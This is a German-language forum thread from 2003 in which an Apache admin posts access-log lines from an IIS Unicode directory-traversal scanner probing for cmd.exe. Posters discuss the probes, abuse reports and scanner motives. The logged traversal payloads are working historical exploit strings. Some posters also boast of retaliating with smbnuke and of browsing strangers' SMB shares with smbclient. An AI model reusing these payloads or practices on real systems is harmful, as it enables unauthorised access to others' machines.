moin,

wenn man sowas in seinen apache-log stehen hat:


217.81.170.xxx - - [27/May/2003:02:31:59 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:01 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:05 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:07 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:08 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:13 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:14 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:15 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:17 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:18 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:20 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:24 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:26 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:28 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:29 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
217.81.170.xxx - - [27/May/2003:02:32:31 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"


was passiert diesem 13jährigen (höchstwarscheinlich) männlichen pubertierenden jugendlichen, wenn ich diesen auszug einfach mal an abuse@t-online.de schicke? mehr als eine abmahnug wird dabei wohl nicht rumkommen oder?

apache 1.3.26 auf debian woody

Hallo,

nichts für ungut, aber das ist wirklich ein alter Hut :ugly: :ugly:

Viele Grüße

Eicke

P.S. ich tippe eher auf Firma mit schlecht gepflegten NT Server

würde mich auch mal interessieren. Ich habe ähnliche Einträge in einem Log-File meines Servers.

Gruß,
Christian

Hallo,

das Internet is voll davon. Am besten auch mal die Suche oben rechts verwenden.

Viele Grüße

Eicke

Er war wohl vor kurzem in Kino und denkt jetzt er wäre Neo "Der große Hacker";)

<> CaN <>

nichts für ungut, aber das ist wirklich ein alter Hut

ich weiss, würde mich aber trotzdem mal interessieren:)

wenn's wirklich 'ne abmahnung gäbe würde mir die schadensfreude schon reichen: der depp hat seinen eltern wohl 'ne kleinigkeit zu erklären....:D


P.S. ich tippe eher auf Firma mit schlecht gepflegten NT Server

nix: apache 1.3.26, steht auch im response-header des servers

Hallo,

ich bin zimelich überzeut davon, daß es nicht ein 13 jähriger Jugendlicher ist!

Viele Grüße

Eicke

Hi

Diese Anzeichen eines hacks sind gefahrlos.
Diese Logs zeigen nur das ein "Unicode scanner" nach IIS sucht und bestimmte Verzeichnisse abklappert.

Da du kein IIS server laufen hast,kannst du diese Logs getrost bei seite legen.

Ein Hackversuch war es nicht,sondern nur ein Scanner der nach IIS Bugs gesucht hat.Und scannen ist nicht verboten.

Nicode heisst ein solcher scanner,mal googlen dann findet man mehr,is für jeden erhältlich ob er 13 oder 43 is :)

gruss lenny

Original geschrieben von lenny

[...]Ein Hackversuch war es nicht,sondern nur ein Scanner der nach IIS Bugs gesucht hat.Und scannen ist nicht verboten. [...]


Fast richtig.

Da es wohl eindeutig T-Online ist, kann er sehr wohl eine art abmahnung bekommen.
In den T-Online AGB's sind nämlich scanns aller Art verboten ;). Da kocht T-Online sein eigens Süppchen.

Ciao Havoc][

Jepp. T-Offline steht net so wirklich auf Scanner wie 'Grim´s Ping' (Pub-Scanner) oder FX-Scanner (Bug-Scanner).
Diese Scanner Pingen eine IP, wenns ne Antwort gibt, versuchen sie nen Anonymous-Login und dann wird bei nem Bug-Scanner noch nach IIS-Bugs gesucht.

Hab gehört, dass T-Offline Einlog-Raten von ca. 1000 ip´s pro sekunde net so gern mag. Dann wird man erstmal angerufen und gefragt, ob man nen bestimmten Virus auf der Platte hat, der Auf ne Menge IP´s Connectet... ;) :D

Gut das mag sein....

Aber ein Hackversuch,und darum drehte sich ja das Thema,war es sicher nicht.Um einen IIS zu hacken muss man eigeniges mehr tun,zumal die verschiedenen lücken wie Unicode schon seid längerem gefixt sind.

gruss lenny

Die Leute, die diese Scanner nutzen, wollen nur ftp-space. Und um den zu kreigen muss man nur nen gebugten Server finden, und dann 3 befehle in den Browser eingeben... Soviel zum Thema M$ und Sicherheit...

wollen nur ftp-space

den giebt's überall im netz, und der ist im regelfall auch etwas schneller, als der dsl-upload


Soviel zum Thema M$ und Sicherheit

immer wieder spassig, wenn man fast täglich die meldungen über neue kritische sicherheitslöcher liest...

Original geschrieben von javafreak
den giebt's überall im netz, und der ist im regelfall auch etwas schneller, als der dsl-upload


Damit sollte gemeint sein, das sicher auch in der T-Online Range schnellere anbindungen anzutreffen sind. Die suchen einen Platz um warez up zu loaden und nicht um ihre Urlaubsfotos zu zeigen (lycos.. ).
Hörte sich für mich nämlich so an, als würdest du das Argument mit dem FTP-Space in Frage stellen.

Ciao Havoc][

also mich nerven diese ständigen Unicode Versuche auch, doch viel mehr stören mich diese Nachrichtendienst Spammer, die ständig versuchen auf port 139 ne nachricht zu senden.

Dort kann es schonmal sein, dass ich mit einem smbnuke reagiere... :D

Hörte sich für mich nämlich so an, als würdest du das Argument mit dem FTP-Space in Frage stellen.

mach ich auch. würden sie ftü-space suchen, würden sie port 21, nicht port 80 nehmen....

ja, aber sie nutzen einen bug im iss auf port 80, um den ftp des iss zu starteten, ueber die cmd, die man oeffnen kann bei nem gebuggten iss-httpd ;)

greez william

*lol*
manchmal einfach zu einfach
häng mal linneighbourhood an die wanschnittstelle
jannste ja als fehlkonfiguration eines winpc's entschuldigen :ugly:
dann alle gefundenen pc's checken ... mit smbclient
dann haste teilweise sogar schreibzugriff
habe mal nen server voll mit warez gemeldet
mein provider hatte sich bedankt!

in meiner lug hacken wir uns gegenseitig um sicherheitslücken aufzudecken
susefirewall2 zu unsicher (8.0)
werde mal freebsd drauftun um es denen mal zu erschweren...
greets,
Silvan

Original geschrieben von pcdog
*lol*
manchmal einfach zu einfach
häng mal linneighbourhood an die wanschnittstelle
jannste ja als fehlkonfiguration eines winpc's entschuldigen :ugly:
dann alle gefundenen pc's checken ... mit smbclient
dann haste teilweise sogar schreibzugriff
habe mal nen server voll mit warez gemeldet
mein provider hatte sich bedankt!

in meiner lug hacken wir uns gegenseitig um sicherheitslücken aufzudecken
susefirewall2 zu unsicher (8.0)
werde mal freebsd drauftun um es denen mal zu erschweren...
greets,
Silvan

ähm, ja.
Du schwärzt leute mit warez bei deinem Provider an (und hast wahrscheinlich selber Movies oder MP3s auf deinem Rechner).?
Gut gemacht :rolleyes: !

susefirewall zu unsicher?
:ugly:

*scnr*

Ciao Havoc][

Original geschrieben von netzmeister
ich bin zimelich überzeut davon, daß es nicht ein 13 jähriger Jugendlicher ist!

Ne ich auch, vom Hirn her wird er wahrscheinlich noch jünger sein.

Original geschrieben von Havoc
ähm, ja.
Du schwärzt leute mit warez bei deinem Provider an (und hast wahrscheinlich selber Movies oder MP3s auf deinem Rechner).?
Gut gemacht :rolleyes: !

susefirewall zu unsicher?
:ugly:

*scnr*

Ciao Havoc][

naja, es war einer da reingekommen
habe in rootpasswd mit 16 stellen, MD5- Verschlüsslung. Es lief in der Defaultkonf von suse, also kein
NFS/FTP/Apache!

!Übrigens: der server hatte nicht nur warez sondern eher kporno!
war mal so ne aktion in der schweiz
bin auch mitglied im ANTI-Netz!
Greetz, PCdog

susefirewall2 zu unsicher (8.0)

Error while processing: unzulässige Pauschalaussage

Hallo,

langsam wird es albern.

Viele Grüße

Eicke